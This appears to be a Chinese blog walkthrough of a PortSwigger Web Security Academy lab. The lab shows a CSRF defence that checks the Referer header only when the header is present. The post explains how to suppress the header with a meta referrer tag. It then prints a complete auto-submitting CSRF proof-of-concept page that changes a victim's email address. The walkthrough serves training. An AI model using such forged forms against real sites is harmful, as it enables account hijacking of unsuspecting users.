Referer 的验证取决于是否存在标头
某些应用程序Referer会在请求中存在标头时验证标头,但如果省略标头则跳过验证。
在这种情况下,攻击者可以通过某种方式制作他们的 CSRF 漏洞利用,从而导致受害者用户的浏览器Referer在结果请求中删除标头。有多种方法可以实现这一点,但最简单的方法是在承载 CSRF 攻击的 HTML 页面中使用 META 标记:
<meta name="referrer" content="never">
本实验室的电子邮件更改功能易受 CSRF 攻击。它试图阻止跨域请求,但具有不安全的回退。
要解决该实验,请使用您的漏洞利用服务器托管一个 HTML 页面,该页面使用CSRF 攻击来更改查看者的电子邮件地址。
您可以使用以下凭据登录自己的帐户: wiener:peter
使用您的浏览器通过 Burp Suite 代理流量,登录您的帐户,提交“更新电子邮件”表单,然后在您的代理历史记录中找到生成的请求。
将请求发送到 Burp Repeater 并观察如果您更改 Referer HTTP 标头中的域,则请求将被拒绝。
完全删除 Referer 标头并观察请求现在已被接受。
创建并托管一个概念证明漏洞利用,如没有防御实验室的CSRF 漏洞的解决方案中所述。包含以下 HTML 以抑制 Referer 标头:<meta name="referrer" content="no-referrer">
存储漏洞,然后单击“交付给受害者”以解决实验室问题。
代码如下:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<head><meta name="referrer" content="never"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac611fbf1f98673d80f336f800780051.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="ExtArE@qq.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>两个要点:
- head标签需要添加
- script脚本不能忘记
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
